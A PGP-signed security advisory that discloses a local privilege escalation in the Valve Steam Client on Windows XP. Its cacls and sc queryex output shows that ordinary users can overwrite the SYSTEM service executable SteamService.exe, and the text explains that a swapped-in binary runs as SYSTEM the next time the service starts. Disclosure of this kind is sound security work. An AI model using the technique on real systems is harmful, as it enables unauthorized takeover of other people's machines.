-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=======================================================================================================
=======================================================================================================
Valve Steam Client Application v1559/1559 Local Privilege Escalation (reloaded)
url: http://www.steampowered.com
Inspiration: http://www.exploit-db.com/exploits/17459/
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.altervista.org/
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Tested on:
Windows XP Professional SP 3
=======================================================================================================
=======================================================================================================
Due to the fact that the whole "Steam" folder is vulnerable:
C:\>cacls "C:\Program Files\Steam"
C:\Program Files\Steam BUILTIN\Users:F <----------- VULNERABLE
BUILTIN\Users:(OI)(CI)(IO)F
NT AUTHORITY\SYSTEM:F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)F
BUILTIN\Users:R
BUILTIN\Users:(OI)(CI)(IO)(accesso speciale:)
GENERIC_READ
GENERIC_EXECUTE
BUILTIN\Power Users:C
BUILTIN\Power Users:(OI)(CI)(IO)C
BUILTIN\Administrators:F
BUILTIN\Administrators:(OI)(CI)(IO)F
NT AUTHORITY\SYSTEM:F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)F
CREATOR OWNER:(OI)(CI)(IO)F
it's interesting to see how this package install a new service called "Steam Client Service" so
C:\>cacls "C:\Program Files\Steam\bin\SteamService.exe
C:\Program Files\Steam\bin\SteamService.exe BUILTIN\Users:F <----------- VUNLERABLE
NT AUTHORITY\SYSTEM:F
BUILTIN\Power Users:C
BUILTIN\Administrators:F
unfortunately, this service is set to run manually
C:\>sc queryex "Steam Client Service"
SERVICE_NAME: Steam Client Service
TYPE : 10 WIN32_OWN_PROCESS
STATE : 1 STOPPED
(NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 1077 (0x435)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PID : 0
FLAGS :
doesn't matter, next time, when someone starts the service, our executable will run with SYSTEM privileges :-)
Be safe
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (MingW32)
iQIcBAEBAgAGBQJODF7/AAoJEJfnJLqVA1kXDCkP/i3/96IRYacZmStMqwORB7nu
cfzrKTHfF3kolZ+A0aV+4XczPQkDoU3ICb34F6gyFcSsTqEvpQrAlywT2bFkK9Km
jWaKT0ewj4G8moLvTektyzRJrZZhN3sygRl16Td5BHkJFVI39HAjM5Uhkmr4L7fL
ADTwoZCVTG3kjmzYEESRBN78bWy2x7wZY1py3qPbfCHH0t2ezW2qHpILoZ7KZnNn
K+lv5Ub515Wqe6KO/QFaSeJLY9qU1I3a6H/hm6sSH94g9CYG54d4X5tR+N+gvrd/
Yx2utH2c/YYurTBMLN807SGU9CjHfUyS5YH/vw5pczR1Y4210EYrXI3/vDPS+nXC
2SsC4g4lWBQYINNYC9+YxdDQpIsIlSt6fM/VvP8eA/q+ClVKoj67aQZvZfUaQbk/
R94rfn9aLtE2o8h363/m0Hkbg0KAVtZ05SE8Zvi1pq+ppu8JPQoaoztYR1uI0xBX
WNhn5rTmFbaHh9Q85gSGqL5EiyQCmo3OCCJ52UUAaHOCEikPSsctozIVI7BOmVHn
q0qjaW63A04CxP0ke+BGRRBExQgGgF27wltTq9to2daquNCBZ2MvU6vwRXMPgSjB
EFR0GnkDgTLkls6c+mWyu5WAy3UEEunShx5gtDmJmnu+UfY2PO6EWh44iM03dkxF
wTua3zLsFnWXTJUAetvS
=BnNl
-----END PGP SIGNATURE-----